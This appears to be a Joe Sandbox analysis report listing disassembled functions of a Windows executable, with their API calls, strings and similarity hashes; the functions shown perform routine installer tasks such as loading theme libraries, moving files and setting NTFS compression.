                                                                  Function 00497E74 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                  • API String ID: 1646373207-834958232
                                                                  • Opcode ID: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                                  • Instruction ID: a447a91dd4d4791f70ca82ece540bd513dbb2543541ea1319c0fea98b289aaf7
                                                                  • Opcode Fuzzy Hash: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                                  • Instruction Fuzzy Hash: 61B09280668712549C0032F30C02B2B0C094840728B1000B73414A00C6CE6C9C004A3D
                                                                  Function 0046441C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0044B650: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                  • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                  • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                  • API String ID: 2238633743-2683653824
                                                                  • Opcode ID: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                                  • Instruction ID: 48aea337371b5dbca44804c24081d1198016d0c57ab59c55e23a700f58ea278e
                                                                  • Opcode Fuzzy Hash: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                                  • Instruction Fuzzy Hash: 89B092A0640705A8CD047BB21857B0F2A4494A0B18790423B301475083EF7C88205A5E
                                                                  Function 0047CE60 Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238), ref: 0047CFB0
                                                                  • FindClose.KERNEL32(000000FF,0047CFDB,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238,00000000), ref: 0047CFCE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileNext
                                                                  • String ID:
                                                                  • API String ID: 2066263336-0
                                                                  • Opcode ID: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                                  • Instruction ID: d4706787225a87a8d466f388a3eb94f1c6a992d4ef98e923761ffbb9731f628b
                                                                  • Opcode Fuzzy Hash: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                                  • Instruction Fuzzy Hash: 32814B70D0024DAFCF11DF95CC91ADFBBB9EF49308F5080AAE808A7291D6399A46CF55
                                                                  Function 00475394 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042EE28: GetTickCount.KERNEL32 ref: 0042EE2E
                                                                    • Part of subcall function 0042EC80: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECB5
                                                                  • GetLastError.KERNEL32(00000000,00475509,?,?,0049C1D0,00000000), ref: 004753F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CountErrorFileLastMoveTick
                                                                  • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                  • API String ID: 2406187244-2685451598
                                                                  • Opcode ID: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                                  • Instruction ID: 7c456f6db07972d04682c0112793eede51d985a58d5564732b5c120557be107c
                                                                  • Opcode Fuzzy Hash: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                                  • Instruction Fuzzy Hash: 5D419670A006099BCB10EFA5D882ADF77B5EF48314F608537E404BB355E7B89E458BAD
                                                                  Function 00413CF0 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 00413D3E
                                                                  • GetDesktopWindow.USER32 ref: 00413DF6
                                                                    • Part of subcall function 00418EB8: 6F59C6F0.COMCTL32(?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418ED4
                                                                    • Part of subcall function 00418EB8: ShowCursor.USER32(00000001,?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418EF1
                                                                  • SetCursor.USER32(00000000,?,?,?,?,00413AEB,00000000,00413AFE), ref: 00413E34
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CursorDesktopWindow$Show
                                                                  • String ID:
                                                                  • API String ID: 2074268717-0
                                                                  • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                  • Instruction ID: 9b0def8c9c64a2c96ee02a3ab3d0705208e3fbe4449c9c566199a376d490666d
                                                                  • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                  • Instruction Fuzzy Hash: D2411931600210AFC710DF2AFA84B5677A5EB69329B16807BE405CB365DB38ED81CF9C
                                                                  Function 00408A44 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A65
                                                                  • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AD4
                                                                  • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B6F
                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString$FileMessageModuleName
                                                                  • String ID:
                                                                  • API String ID: 704749118-0
                                                                  • Opcode ID: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                                  • Instruction ID: 89cba0e7522a9b83fcc2071cfb28f1965358b02fab5b9b8693395207a1b0bde5
                                                                  • Opcode Fuzzy Hash: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                                  • Instruction Fuzzy Hash: A63110716083809AD330EB65CA45B9FB7D8AB85704F44483FB6C8E72D1DB7899048B6B
                                                                  Function 0044E8BC Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E905
                                                                    • Part of subcall function 0044CF48: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF7A
                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E989
                                                                    • Part of subcall function 0042BBAC: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC0
                                                                  • IsRectEmpty.USER32(?), ref: 0044E94B
                                                                  • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E96E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                  • String ID:
                                                                  • API String ID: 855768636-0
                                                                  • Opcode ID: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                                  • Instruction ID: fae584cc962e85b422f7b584321c3529105593e75d7f1ff9ae22b75d4be52dd2
                                                                  • Opcode Fuzzy Hash: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                                  • Instruction Fuzzy Hash: F1116A71B4030067E610BA3A8C86B5B76C99B98748F15093FB505EB3C2DE7DDC0983A9
                                                                  Function 00494E30 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00494E94
                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00494EAF
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00494EC9
                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00494EE4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: OffsetRect
                                                                  • String ID:
                                                                  • API String ID: 177026234-0
                                                                  • Opcode ID: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                                  • Instruction ID: 1704218a4531d37ac2ab58ce54688b95f7f5c665c469e7ed4027bbe581d59bf2
                                                                  • Opcode Fuzzy Hash: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                                  • Instruction Fuzzy Hash: C42190BA704201AFCB00DE69CD85E6BB7DAEFC4340F148A3AF944C7249E638ED058755
                                                                  Function 00417210 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32 ref: 00417258
                                                                  • SetCursor.USER32(00000000), ref: 0041729B
                                                                  • GetLastActivePopup.USER32(?), ref: 004172C5
                                                                  • GetForegroundWindow.USER32(?), ref: 004172CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                  • String ID:
                                                                  • API String ID: 1959210111-0
                                                                  • Opcode ID: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                                  • Instruction ID: d8f212eab659ab8611038d963e52f28b2b0f2619fe8d71a0b25c9b868ff876e9
                                                                  • Opcode Fuzzy Hash: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                                  • Instruction Fuzzy Hash: B121B0303486008AC710AB69D944AEB33F1EF58724B1145BBF8459B392DB3DDC82CB8D
                                                                  Function 00494AE8 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494AFD
                                                                  • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494B11
                                                                  • MulDiv.KERNEL32(F70A2BE8,00000008,?), ref: 00494B25
                                                                  • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00494B43
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                                  • Instruction ID: 4e21b8649f01b029d01931fbc34569bb41b57a17a8c4fb2cd57aac9c741bb68b
                                                                  • Opcode Fuzzy Hash: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                                  • Instruction Fuzzy Hash: 1F113072605104AFCF40DFA9C8C5E9B7BECEF8D320B1541AAF908DB246D634ED418B68
                                                                  Function 0041F478 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassInfoA.USER32(00400000,0041F468,?), ref: 0041F499
                                                                  • UnregisterClassA.USER32(0041F468,00400000), ref: 0041F4C2
                                                                  • RegisterClassA.USER32(00499598), ref: 0041F4CC
                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F507
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                  • String ID:
                                                                  • API String ID: 4025006896-0
                                                                  • Opcode ID: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                                  • Instruction ID: e4d668e9dca91fd32e585eae6d60143d6dfbdf42e70c096e3b85bfad9ab1786c
                                                                  • Opcode Fuzzy Hash: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                                  • Instruction Fuzzy Hash: 63016D722001046BDB10EBACED81E9B3798A729314B10423FBA15E73A2D7399D458BAC
                                                                  Function 0040D1F8 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D20F
                                                                  • LoadResource.KERNEL32(00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C,0000000A,00000000), ref: 0040D229
                                                                  • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C), ref: 0040D243
                                                                  • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?), ref: 0040D24D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 3473537107-0
                                                                  • Opcode ID: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                                  • Instruction ID: 3283e33870439dafd25d8e1e147512606e62b5bf6a0133693b61d2317928fdf1
                                                                  • Opcode Fuzzy Hash: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                                  • Instruction Fuzzy Hash: C5F04FB26056047F8B04EE99A881D5B77DDDE88264314027EF908EB242DA38DD018B69
                                                                  Function 004703C0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00470411
                                                                  Strings
                                                                  • Unsetting NTFS compression on file: %s, xrefs: 004703F7
                                                                  • Setting NTFS compression on file: %s, xrefs: 004703DF
                                                                  • Failed to set NTFS compression state (%d)., xrefs: 00470422
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                  • API String ID: 1452528299-3038984924
                                                                  • Opcode ID: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                                  • Instruction ID: 0d596443d05caf7374ea98a63d842d8765eee9d82fb477a7c18f0f713548320e
                                                                  • Opcode Fuzzy Hash: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                                  • Instruction Fuzzy Hash: 3601A730E0924896CB14D7AD94412EDBBB48F09304F54C1EFB85CE7382DB780A098B9A
                                                                  Function 0046FC14 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 0046FC65
                                                                  Strings
                                                                  • Failed to set NTFS compression state (%d)., xrefs: 0046FC76
                                                                  • Setting NTFS compression on directory: %s, xrefs: 0046FC33
                                                                  • Unsetting NTFS compression on directory: %s, xrefs: 0046FC4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                  • API String ID: 1452528299-1392080489
                                                                  • Opcode ID: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                                  • Instruction ID: 1ff60dd8eb5a114f2a7af6b3d642365226de0c959c43d8a3966afd89414ec8a0
                                                                  • Opcode Fuzzy Hash: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                                  • Instruction Fuzzy Hash: 5B011730E0824C56CB04D7ADA4412DDBBB4AF4D314F54C5BFA899D7382EA790A0D879B
